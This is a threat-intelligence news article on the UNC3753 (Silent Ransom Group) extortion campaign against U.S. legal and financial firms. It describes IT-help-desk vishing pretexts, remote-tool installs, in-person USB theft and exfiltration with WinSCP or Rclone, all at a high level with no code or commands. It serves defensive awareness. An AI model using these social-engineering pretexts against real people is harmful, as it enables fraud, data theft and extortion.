UNC3753 Accelerates U.S. Data Theft Extortion Campaign Through Vishing and Physical Intrusions
Cybersecurity researchers have revealed a troubling trend in data theft extortion campaigns targeting various sectors, including professional, legal, and financial services in the United States. Between January and May 2026, these attacks have been linked to a threat actor known as UNC3753, also referred to as Chatty Spider, Luna Moth, and the Silent Ransom Group (SRG).
The Modus Operandi of UNC3753
According to findings from Google Mandiant and the Google threat intelligence Group (GTIG), UNC3753 employs voice phishing, or vishing, along with social engineering tactics to gain unauthorized access to corporate networks. The researchers, including Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, and Tyler McLellan, noted that the group often initiates contact through phone calls, posing as IT support personnel. They utilize pretexts such as data migration or invoice-related inquiries to persuade targets into hosting screen-sharing sessions and downloading remote monitoring and management (RMM) tools.
Once access is granted, attackers either conduct direct searches for sensitive files or manipulate victims into executing actions that facilitate data exfiltration. The types of stolen information include proprietary legal documents, personally identifiable information (PII), and financial records.
Physical Intrusions and Escalation of Tactics
In a notable escalation of tactics, some attackers have physically infiltrated corporate offices, echoing recent advisories from the U.S. Federal Bureau of Investigation (FBI). These intrusions involve impersonating IT technicians to gain access to systems and utilize removable USB drives for data theft. The FBI highlighted that this approach enables attackers to exfiltrate data directly from the victim’s computer.
The group has demonstrated a capacity for sophisticated operations, with the FBI stating, “By sending someone in-person to the victim’s location to facilitate the intrusion, SRG actors exfiltrate data to an external hard drive or USB drive inserted by the threat actor into the victim’s computer.”
Tactical Overlaps with Other Threat Groups
Google’s analysis indicates that UNC3753 shares tactical similarities with another threat cluster, UNC2686, which has been previously associated with BazarCall-style phishing campaigns. Although UNC3753 has been known to deploy LockBit Black ransomware, its primary focus since 2022 has shifted toward extortion-only operations, pressuring victims to comply with ransom demands or face the public release of their data on the LEAKEDDATA site.
Both UNC3753 and UNC2686 are considered offshoots of the now-defunct Conti ransomware gang. Early iterations of their campaigns included subscription cancellation lures as part of callback phishing attacks aimed at installing remote access software on victims’ machines.
Exploiting Communication Platforms
Beginning around March 2025, UNC3753 has been observed impersonating internal corporate IT help desk staff to lure victims into screen-sharing sessions on platforms like Zoom, Microsoft Teams, or Quick Assist. This strategy effectively circumvents traditional security measures.
The threat group often initiates campaigns with benign, invoice-themed emails sent from consumer email accounts controlled by the attackers. These emails typically lack active links or malicious attachments, serving primarily to establish a pretext that raises the target’s internal security concerns, making them more susceptible to follow-up voice calls.
Once a screen-sharing session is established, attackers guide victims to install legitimate remote desktop software such as AnyDesk, Bomgar, SuperOps RMM, or Zoho Assist. Instructions for installation are often shared through a legitimate service called “privnote.com,” which allows users to send self-destructing notes.
Data Exfiltration and Extortion Demands
UNC3753 has also been documented establishing Zoom sessions directly on victims’ personal laptops to access corporate virtual desktop infrastructure (VDI). This allows them to delve deeper into corporate file systems, enumerating local and cloud directories and harvesting data from sensitive folders, including those related to tax filings, audits, client agreements, and Social Security numbers (SSNs).
In the final stages of their operation, captured data is transmitted to the attackers using tools like WinSCP or Rclone, or through email addresses controlled by the threat actors. Following this, victims receive extortion demands via email, typically within 30 minutes of the attackers exiting the target environment. These emails impose a three-day deadline for ransom negotiations and threaten to contact employees and clients directly if the victims do not respond. Additionally, they warn of publishing the stolen information on data leak sites.
High-Value Targets and the Human Element
Legal services firms are particularly attractive targets for extortion actors due to their repositories of sensitive client transaction files, merger and acquisition plans, trade secrets, and regulatory reports. The threat actors understand that legal entities face significant reputational and regulatory risks, motivating them to resolve extortion situations discreetly.
The use of voice-guided social engineering tactics allows these groups to bypass robust technical defenses, web security gateways, and multi-factor authentication configurations. This highlights the ongoing challenge organizations face in securing their environments against increasingly sophisticated and human-centric attack vectors.
For further insights into the evolving landscape of cybersecurity threats, visit thehackernews.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
